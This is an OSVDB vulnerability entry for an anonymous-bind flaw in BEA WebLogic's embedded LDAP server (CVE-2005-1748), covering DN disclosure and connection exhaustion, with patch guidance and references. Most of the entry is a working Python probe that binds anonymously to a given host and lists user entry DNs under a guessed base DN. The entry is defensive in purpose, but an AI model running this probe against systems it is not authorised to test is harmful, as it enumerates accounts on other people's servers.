BEA WebLogic LDAP Server Anonymous Bind

2005-05-24T08:59:34
ID OSVDB:16839
Type osvdb
Reporter OSVDB
Modified 2005-05-24T08:59:34

Description

Vulnerability Description

The WebLogic embedded LDAP server contains a flaw that may lead to unauthorized information disclosure and also allow a remote denial of service. The issue is triggered when a remote user binds anonymously to the embedded LDAP server: the server accepts the bind and, if the directory's base DN and layout can be guessed, discloses the user entries (their DNs, but not their attributes). The same anonymous bind can also be used to exhaust the LDAP server by opening a large number of connections. This results in a loss of confidentiality and availability of the LDAP service.
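
As an added check (example code written for this entry, not BEA or OSVDB code), the following Python script performs the anonymous bind the description refers to against a given host and port, then issues a DN-only subtree search under a guessed base DN and reports the bind result code and any entry DNs returned. It encodes LDAPv3 BER by hand so it needs no LDAP library. The host, port and base DN are command-line arguments and are assumptions: on an affected WebLogic server the embedded LDAP typically listens on the server's own listen port (for example 7001) with a base DN derived from the domain name, but nothing on this page fixes those values. It does not attempt the connection-exhaustion denial of service.

```python
"""Probe an LDAP server for anonymous bind and DN disclosure.
Hand-encoded LDAPv3 BER (no python-ldap needed).  Example code added
to this entry; not vendor or OSVDB code."""
import socket
import sys


def ber_len(n):
    """BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, content):
    return bytes([tag]) + ber_len(len(content)) + content


def ber_int(n, tag=0x02):
    """Non-negative INTEGER (or ENUMERATED via tag) in minimal two's complement."""
    body = n.to_bytes(max(1, (n.bit_length() + 8) // 8), "big")
    return tlv(tag, body)


def ldap_message(msg_id, op):
    return tlv(0x30, ber_int(msg_id) + op)


def anonymous_bind_request(msg_id=1):
    # BindRequest ::= [APPLICATION 0] { version 3, name "", simple "" }
    op = ber_int(3) + tlv(0x04, b"") + tlv(0x80, b"")
    return ldap_message(msg_id, tlv(0x60, op))


def dn_only_search_request(base_dn, msg_id=2):
    # SearchRequest ::= [APPLICATION 3]; wholeSubtree scope, filter
    # (objectClass=*) as a 'present' filter [7], attribute list "1.1"
    # asks the server to return no attributes, only entry DNs.
    op = (tlv(0x04, base_dn.encode()) + ber_int(2, 0x0A) + ber_int(0, 0x0A)
          + ber_int(0) + ber_int(0) + tlv(0x01, b"\x00")
          + tlv(0x87, b"objectClass") + tlv(0x30, tlv(0x04, b"1.1")))
    return ldap_message(msg_id, tlv(0x63, op))


def read_tlv(buf, pos=0):
    """Decode one TLV at pos; returns (tag, content, end). EOFError if truncated."""
    if pos + 2 > len(buf):
        raise EOFError("truncated TLV")
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        length, start = first, pos + 2
    else:
        n = first & 0x7F
        length = int.from_bytes(buf[pos + 2:pos + 2 + n], "big")
        start = pos + 2 + n
    end = start + length
    if end > len(buf):
        raise EOFError("truncated TLV")
    return tag, buf[start:end], end


def parse_messages(buf):
    """Split a byte stream into (msg_id, op_tag, op_content) triples."""
    out, pos = [], 0
    while pos < len(buf):
        tag, body, pos = read_tlv(buf, pos)
        if tag != 0x30:
            raise ValueError("not an LDAPMessage")
        _, mid, off = read_tlv(body)
        op_tag, op, _ = read_tlv(body, off)
        out.append((int.from_bytes(mid, "big"), op_tag, op))
    return out


def bind_result_code(buf):
    """resultCode of the first BindResponse [APPLICATION 1] (0 = success)."""
    for _, op_tag, op in parse_messages(buf):
        if op_tag == 0x61:
            _, code, _ = read_tlv(op)
            return int.from_bytes(code, "big")
    raise ValueError("no BindResponse")


def entry_dns(buf):
    """DNs from SearchResultEntry [APPLICATION 4] messages plus the final resultCode."""
    dns, done = [], None
    for _, op_tag, op in parse_messages(buf):
        if op_tag == 0x64:
            _, dn, _ = read_tlv(op)
            dns.append(dn.decode())
        elif op_tag == 0x65:
            _, code, _ = read_tlv(op)
            done = int.from_bytes(code, "big")
    return dns, done


def recv_until(sock, op_tag):
    """Accumulate whole LDAPMessages until one carrying op_tag has arrived."""
    buf = b""
    while True:
        chunk = sock.recv(65536)
        if not chunk:
            raise ConnectionError("server closed connection")
        buf += chunk
        try:
            if any(t == op_tag for _, t, _ in parse_messages(buf)):
                return buf
        except EOFError:
            continue  # last message still incomplete; keep reading


def probe(host, port, base_dn):
    """Anonymous bind, then DN-only search; returns (bind resultCode, [DNs])."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(anonymous_bind_request())
        code = bind_result_code(recv_until(s, 0x61))
        if code != 0:
            return code, []
        s.sendall(dn_only_search_request(base_dn))
        dns, _ = entry_dns(recv_until(s, 0x65))
        return code, dns


if __name__ == "__main__":
    # host, port and base DN are assumptions supplied by the operator
    code, dns = probe(sys.argv[1], int(sys.argv[2]), sys.argv[3])
    print("bind resultCode:", code)
    for dn in dns:
        print(dn)
```

Run as `python ldap_anon_probe.py host 7001 'dc=mydomain'` (all three values assumed). A bind resultCode of 0 followed by entry DNs confirms the disclosure; resultCode 49 (invalidCredentials) or 48 (inappropriateAuthentication) means anonymous binds are refused. The search requests the pseudo-attribute "1.1" so only DNs are asked for, which is all the description says the server discloses.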

Solution Description

For WebLogic 8.1, upgrade to 8.1 SP4 first and then apply the patch released by the vendor (advisory BEA05-81.00). For WebLogic 7.0, upgrade to 7.0 SP6, which has been reported to fix this vulnerability.

Short Description

The WebLogic embedded LDAP server accepts anonymous binds, which disclose user entries (DNs only, not attributes) when the directory layout can be guessed and can be used to exhaust the server with many connections, causing a loss of confidentiality and availability.

References:

Vendor URL: http://www.bea.com/
Vendor Specific Advisory URL
Security Tracker: 1014049
Secunia Advisory ID: 15486
Keyword: BEA05-81.00
CVE: CVE-2005-1748
Bugtraq ID: 13717